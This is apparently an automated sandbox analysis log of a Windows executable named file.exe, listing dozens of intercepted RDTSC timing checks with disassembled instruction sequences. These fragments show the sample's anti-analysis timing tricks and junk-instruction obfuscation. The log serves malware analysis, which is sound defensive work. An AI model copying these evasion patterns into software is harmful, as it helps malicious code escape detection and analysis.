Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D695B3 second address: D695B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E299 second address: D6E2AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1674F90E16h 0x0000000a jl 00007F1674F90E16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D6E2AB second address: D6E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72120 second address: D72136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Bh 0x00000009 jc 00007F1674F90E16h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D72136 second address: D7213D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7213D second address: D7216C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E28h 0x00000009 popad 0x0000000a push eax 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jnp 00007F1674F90E24h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7216C second address: D72170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71515 second address: D71519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71519 second address: D71537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71537 second address: D7154D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E1Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7154D second address: D71555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71555 second address: D7155B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D71828 second address: D7183B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jc 00007F1675279DA6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A3B second address: D76A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A41 second address: D76A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76A45 second address: D76A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e ja 00007F1674F90E23h 0x00000014 jmp 00007F1674F90E1Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76BD4 second address: D76BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76BD9 second address: D76BF2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F1674F90E1Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D49 second address: D76D5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F1675279DA6h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F1675279DA6h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D5F second address: D76D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D63 second address: D76D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F1675279DACh 0x00000012 jo 00007F1675279DA6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D7B second address: D76D80 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D76D80 second address: D76D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c ja 00007F1675279DA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26DC5 second address: D26E4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1674F90E18h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 adc edx, 27F37600h 0x0000002c mov edx, dword ptr [ebp+122D3200h] 0x00000032 mov edi, 4AE75881h 0x00000037 mov ebx, dword ptr [ebp+12487FDFh] 0x0000003d mov dl, ah 0x0000003f add eax, ebx 0x00000041 push esi 0x00000042 cld 0x00000043 pop ecx 0x00000044 movsx ecx, si 0x00000047 nop 0x00000048 jne 00007F1674F90E2Eh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jnl 00007F1674F90E25h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26E4F second address: D26ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007F1675279DA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F1675279DA8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 clc 0x0000002a push 00000004h 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F1675279DA8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 call 00007F1675279DAEh 0x0000004b pop edx 0x0000004c mov cx, di 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F1675279DB7h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D26ECE second address: D26ED9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D77A4E second address: D77A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D35D second address: D7D36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F1674F90E16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D36D second address: D7D371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D371 second address: D7D38D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D92A second address: D7D934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1675279DA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7D934 second address: D7D93F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DEF5 second address: D7DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DEFD second address: D7DF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF03 second address: D7DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF0A second address: D7DF11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7DF11 second address: D7DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jbe 00007F1675279DA6h 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E575 second address: D7E57C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E57C second address: D7E59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D7E59F second address: D7E5A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CA6 second address: D84CB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007F1675279DA6h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CB6 second address: D84CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CBC second address: D84CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CC2 second address: D84CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D84CC6 second address: D84CE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DB4h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD8444 second address: CD844C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CD844C second address: CD8454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E8B second address: D87E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F1674F90E16h 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E96 second address: D87E9B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D87E9B second address: D87EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F1674F90E16h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88007 second address: D8800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88152 second address: D88156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88156 second address: D8815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8815A second address: D8816D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E1Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8816D second address: D88173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88173 second address: D88177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D882CB second address: D882CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D882CF second address: D882F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F1674F90E16h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8849F second address: D884C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007F1675279DB6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D884C3 second address: D884C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88623 second address: D8862E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1675279DA6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8862E second address: D88633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88633 second address: D88639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88639 second address: D8863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8863F second address: D8864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D8864B second address: D88664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F1674F90E16h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push edi 0x00000010 jno 00007F1674F90E16h 0x00000016 push esi 0x00000017 pop esi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D88664 second address: D88674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9199D second address: D919A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D919A3 second address: D919A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D919A9 second address: D919B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9204D second address: D9207E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F1675279DB2h 0x00000010 pop eax 0x00000011 jno 00007F1675279DA8h 0x00000017 popad 0x00000018 jp 00007F1675279DC8h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9207E second address: D92082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92082 second address: D9208C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9208C second address: D92090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92090 second address: D92094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D921B2 second address: D921B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D921B8 second address: D921D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D925E5 second address: D925F7 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1674F90E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D925F7 second address: D9262E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DAEh 0x00000007 jo 00007F1675279DA6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007F1675279DADh 0x0000001c popad 0x0000001d pushad 0x0000001e jbe 00007F1675279DA6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9262E second address: D92645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1674F90E1Ch 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92645 second address: D9264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9264B second address: D9265A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F1674F90E16h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D92E82 second address: D92ECC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DB1h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 pushad 0x00000017 pushad 0x00000018 jo 00007F1675279DA6h 0x0000001e jmp 00007F1675279DB1h 0x00000023 jmp 00007F1675279DADh 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914CC second address: D914D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914D0 second address: D914D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D914D6 second address: D914DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D96CBC second address: D96CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC37 second address: D9DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC3B second address: D9DC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC3F second address: D9DC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1674F90E23h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1674F90E22h 0x00000012 jg 00007F1674F90E16h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC72 second address: D9DC7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D9DC7D second address: D9DC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1674F90E16h 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DA8245 second address: DA8263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1675279DB4h 0x00000009 jne 00007F1675279DA6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACA34 second address: DACA39 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DACA39 second address: DACA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF53D second address: DAF556 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: DAF556 second address: DAF56D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
